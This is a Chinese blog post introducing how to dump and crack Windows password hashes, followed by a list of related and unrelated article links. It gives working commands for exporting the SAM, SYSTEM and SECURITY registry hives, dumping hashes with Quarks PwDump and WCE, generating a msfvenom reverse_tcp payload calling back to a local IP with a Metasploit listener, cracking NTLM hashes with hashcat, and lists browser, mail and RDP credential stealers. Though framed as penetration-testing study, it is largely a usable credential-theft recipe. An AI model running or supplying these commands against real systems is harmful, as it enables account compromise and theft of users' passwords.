Windows密码获取和破解(初探)
Windows密码获取和破解
本文只是简单的讲明密码获取和破解
具体的操作细节均以模糊或具体代码混淆等方式避开
如有兴趣请自行研究,本文不做细说~~~
获取思路:
Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~
- 通过0day直接获得权限;通过工具(WCE)或者漏洞(MS08-067溢出获得system权限)
- 内网环境下通过嗅探扫描探测,暴力破解获取系统密码
- 本地直接获得密码(读取系统system文件下的config所有文件逐一分析)
密码获取工具:
gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……
Quarks PwDump:
是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。
Quarks PwDump -dh1 // 导出本地哈希值
Quarks PwDump -dhdc // 导出内存中域账户哈希值
Quarks PwDump -dhd // 导出域哈希值(指定NTDS文件)
WCE:
是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一
wce -a //获取所有账户哈希值
reg命令:导出密码文件
通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
命令执行后将会将文件保存在本地~
PowerShell获取:
PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码
MSF反弹hashdump及mimikatz获取:
通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~
生成反弹木马:
> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe
MSF使用反弹处理模块
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.2.0
> set LPORT 443
> exploit
提权操作……
其它小工具
下列小工具在Windows平台运行就会获得相关的用户凭证……
mailpv:获取mail密码
mspass:获取MSN密码
pst_password:获取Outlook密码
IE PV:获取IE浏览器缓存密码
各类浏览器密码获取工具
passwordfox:获取Firefox浏览器凭证
chromepass:获取谷歌浏览器凭证
无线网络密码获取工具
远程桌面密码获取:
rdpv —— cmdkey/list —— netpass.exe
破解密码哈希值
在线破解:
- CMD5官网
- ophcrack在线破解
ophcrack破解:
导入哈希值,加载Tables,执行Crack~
hashcat破解:
最流行的、最快的密码破解工具

破解:
将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:
hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username
-m 1000表示破解密码类型为NTLM
-a 0表示采用字典破解
-o [feilname].txt表示将破解后的文件输出到指定的文件中
--remove win.hash表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解
password.lst密码字典文件
物理获取密码
获取SAM和SYSTEM文件
文件通常在C:\Windows\System32\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件
导入文件
使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~
破解哈希密码
导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解
【工具下载:https://pan.baidu.com/s/1w2HDmxBAnQg9vtbv-DoW-A】
Windows密码获取和破解(初探)的更多相关文章
- 获取 Windows 密码「GitHub 热点速览 v.21.28」
作者:HelloGitHub-小鱼干 安全问题一直是 GitHub 的一大热点,因为数据安全问题诞生的各类自托管服务便是.而本周周榜上的 2 个和安全主题相关的项目,有些不同.mimikatz 是个老 ...
- 我是如何破解你的WINDOWS密码的 ?(1)
我是如何破解你的WINDOWS密码的 ?(1) 密码可以看作我们主要,甚至某些情况下唯一可用于防范入侵的防线.就算入侵者无法在物理上接触到计算机,对于对外的Web应用,他们依然可以通过远程桌面协议或身 ...
- 我是如何破解你的WINDOWS密码的 ?(2)
介绍 在这个系类的第一部分中,我们揭示了windows创建和储存密码的机制.我们也涉猎了一点两种加密方法的弱点和破解的方法.在这系列的第二篇也是最后一篇文章中,我会实战用网上免费的工具一步一步的来破解 ...
- Kali Linux Web 渗透测试视频教—第二十课-利用kali linux光盘或者usb启动盘破解windows密码
Kali Linux Web 渗透测试视频教—第二十课-利用kali linux光盘或者usb启动盘破解windows密码 文/玄魂 目录 Kali Linux Web 渗透测试视频教—第二十课-利用 ...
- Windows密码破解工具ophcrack
Windows密码破解工具ophcrack Windows用户密码都采用哈希算法加密进行保存.Kali Linux内置了专用破解工具ophcrack.该工具是一个图形化界面工具,支持Windows ...
- [Windows Server 2012] 手工破解MySQL密码
★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂 是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:破解MySQL ...
- meterpreter中使用mimikatz获取windows密码
进去meterpreter后getuid一下 这获得系统管理员权限 开始 加载mimikatz模块 load mimikatz 加载成功. 第一种方法: 获取登录密码的hash值 msv 上面已经是得 ...
- 基于HOOK和MMF的Windows密码渗透技术
随着计算机与网络的普及,信息安全越来越成为人们所普遍关心的大事.密码的渗透与反渗透在此领域表现的愈演愈烈.本文深入分析了各个版本Windows密码的特点,尤其是针对windws2K/XP安全性提高的情 ...
- 利用CVE-2018-0950漏洞自动窃取Windows密码
i春秋作家:浅安 0×00 前言 记得还在2016年的时候,我的一个同事那时还在使用CERT BFF(自动化模糊测试工具),他向我询问到如何将微软办公软件中看起来可利用的漏洞转化成可以运行的病毒程序并 ...
随机推荐
- scrapy抓取人人网上的“新鲜事”
利用scrapy模拟登陆人人网,笔者本打算抓取一下个人页面新鲜事,感觉这个网站越做越差,都懒得抓里面的东西了.这里仅仅模拟人人网登陆,说明一下scrapy的POST请求问题. 人人网改版之后,反爬措施 ...
- python常见字符串操作
附: python2.x和python3.x中raw_input( )和input( )区别: 备注:1.在python2.x中raw_input( )和input( ),两个函数都存在,其中区别为r ...
- 【高可用架构】借助Envoy工具发布项目到多台服务器
前言 在上一篇,我们已经成功在开发机上部署了Deploy项目,下面我们继续在开发机上安装Envoy 两台应用服务器的IP 192.168.10.12 192.168.10.18 [高可用架构]系列链接 ...
- 使用aop加解密http接口
背景 最近在写一个小程序接口,由于安全性比较高,因此需要给请求参数和响应进行加密处理.如果在每个方法上都加密解密,那样代码就显得太繁琐了而且工作量会加大.所以,我们会统一进行加解密处理,一种比较传统的 ...
- WSGI到底是什么?
在用Python Web开发时经常会遇到WSGI,所以WSGI到底是什么呢?本文我们一起来揭开WSGI神秘的面纱! 先来看一下WSGI的介绍: 全称Python Web Server Gateway ...
- Calling the Web Service dynamically (.NET 动态访问Web Service)
针对.NET平台下的WebService访问,为达到不添加引用的情况下,动态调用外部服务. 主体方法: public class WebServiceHelper { //Calling the We ...
- Quantitative proteomics of Uukuniemi virus-host cell interactions reveals GBF1 as proviral host factor for phleboviruses(乌库涅米病毒-宿主细胞互作的定量蛋白质组学揭示了GBF1是个白蛉病毒的前病毒宿主因子)-解读人:谭亦凡
期刊名:Molecular & Cellular Proteomics 发表时间:(2019年12月) IF:4.828 单位:1德国海德堡大学附属医院2德国汉诺威医科大学3德国亥姆霍茲感染研 ...
- react-native Android release打包失败
npm run build报错(android) react-native 0.5x在安卓环境 gradle 3.x版本下编译release版本的时候提示编译失败,但是debug模式下是没有问题的. ...
- Zookeeper Watcher接口
在ZooKeeper中,接口类Watcher用于表示一个标准的事件处理器,其定义了事件通知相关的逻辑,包含KeeperState和EventType两个枚举类,分别代表了通知状态和事件类型,同时定义了 ...
- css Backgroud-clip (文字颜色渐变)
首先来瞄一下background-clip,这个属性是干嘛的? 顾名思义,背景裁剪... 按照我自己的理解就是背景的显示区域 此处粘上MDN的示例链接(嫌麻烦的,后面我也贴上截图)https:// ...